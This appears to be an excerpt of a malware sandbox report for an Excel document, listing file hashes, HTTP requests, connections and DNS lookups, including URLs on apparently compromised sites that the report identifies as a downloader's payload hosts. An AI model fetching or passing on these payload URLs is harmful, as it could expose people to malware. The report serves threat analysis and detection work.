SHA256: E9DE359EC16463B50BC4ECBEB44781E8EFB69CBBE3D9F8E881B4AF2F14D7614F
3612 EXCEL.EXE (binary) C:\Users\admin\AppData\Local\Microsoft\Office\16.0\SmartLookupCache\microsoft.office.smartlookup.ssr.js
MD5: BC749DE3CC12B1FA311B7DE9A2933667
SHA256: 12C1084BC4CA1D226C53B73CC7C53E451F5E0540D0BD527066B39EA9DE90B4C7
3612 EXCEL.EXE (binary) C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HC5GN6LD0YIR9CDSSK3I.temp
MD5: E4A1661C2C886EBB688DEC494532431C
SHA256: B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
3040 powershell.exe (text) C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_t3nalt3y.lkv.ps1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3612 EXCEL.EXE (binary) C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
MD5: 4FCB2A3EE025E4A10D21E1B154873FE2
SHA256: 90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
3612 EXCEL.EXE (binary) C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres
MD5: 419A67890DAB7370D6B56F8341BDBDBA
SHA256: 6403C590BD9A8F0A836B3C0A15C4882C583196FD6871F8674B4007BA3825EC71
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
21
TCP/UDP connections
32
DNS requests
26
Threats
0

HTTP requests

PID  | Process             | Method | Code | IP                  | URL                                                                          | CN      | Type   | Size    | Reputation
-    | -                   | GET    | 301  | 34.149.87.45:443    | https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/                                  | unknown | -      | -       | -
-    | -                   | GET    | 301  | 151.106.124.14:443  | https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/                               | unknown | -      | -       | -
3568 | svchost.exe         | GET    | 200  | 69.192.161.161:80   | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl          | unknown | -      | -       | whitelisted
4712 | MoUsoCoreWorker.exe | GET    | 200  | 69.192.161.161:80   | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl          | unknown | -      | -       | whitelisted
4712 | MoUsoCoreWorker.exe | GET    | 200  | 23.48.23.156:80     | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl   | unknown | -      | -       | whitelisted
-    | -                   | HEAD   | 200  | 23.32.100.39:443    | https://uci.cdn.office.net/mirrored/smartlookup/current/version.json        | unknown | -      | -       | -
-    | -                   | POST   | 200  | 40.79.197.34:443    | https://self.events.data.microsoft.com/OneCollector/1.0/                    | unknown | -      | -       | whitelisted
-    | -                   | GET    | 404  | 34.149.87.45:443    | https://www.trasix.com/wp-admin/y5Aa1jt0Sp2Qk                               | unknown | html   | 2.89 Kb | -
-    | -                   | GET    | 200  | 23.32.100.39:443    | https://uci.cdn.office.net/mirrored/smartlookup/current/main_ssr.html       | unknown | html   | 396 Kb  | whitelisted
-    | -                   | GET    | 200  | 23.32.100.39:443    | https://uci.cdn.office.net/mirrored/smartlookup/current/dictionary_words_bloom_filter.data | unknown | binary | 117 Kb | whitelisted

The two payload hosts that appear here are the third and fourth entries of the downloader's URL list: trasix.com redirected (301) to www.trasix.com, which answered 404 with a 2.89 Kb HTML page, and www.parkinsons.co.in also answered 301. The report's PID column is empty for these rows. Only 10 of the 21 HTTP(S) requests counted above are listed in this excerpt.

Connections

PID  | Process             | IP                  | Domain                          | ASN                         | CN | Reputation
4712 | MoUsoCoreWorker.exe | 40.127.240.158:443  | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
-    | -                   | 192.168.100.255:137 | -                               | -                           | -  | whitelisted
3568 | svchost.exe         | 40.127.240.158:443  | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
-    | -                   | 40.127.240.158:443  | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4    | System              | 192.168.100.255:138 | -                               | -                           | -  | whitelisted
4712 | MoUsoCoreWorker.exe | 23.48.23.156:80     | crl.microsoft.com               | Akamai International B.V.   | DE | whitelisted
4712 | MoUsoCoreWorker.exe | 69.192.161.161:80   | www.microsoft.com               | AKAMAI-AS                   | DE | whitelisted
3568 | svchost.exe         | 69.192.161.161:80   | www.microsoft.com               | AKAMAI-AS                   | DE | whitelisted
4712 | MoUsoCoreWorker.exe | 4.231.128.59:443    | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3568 | svchost.exe         | 4.231.128.59:443    | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted

Only 10 of the 32 TCP/UDP connections counted above are listed in this excerpt; none of the rows shown belong to the downloader's hosts, which appear only in the HTTP and DNS sections.

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
whitelisted
google.com
  • 142.250.185.174
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 69.192.161.161
whitelisted
officeclient.microsoft.com
  • 52.109.76.240
whitelisted
actividades.laforetlanguages.com
unknown
sbcopylive.com.br
unknown
trasix.com
  • 185.230.63.107
unknown
ecs.office.com
  • 52.113.194.132
whitelisted
www.trasix.com
  • 34.149.87.45
unknown

Threats

No threats detected
No debug info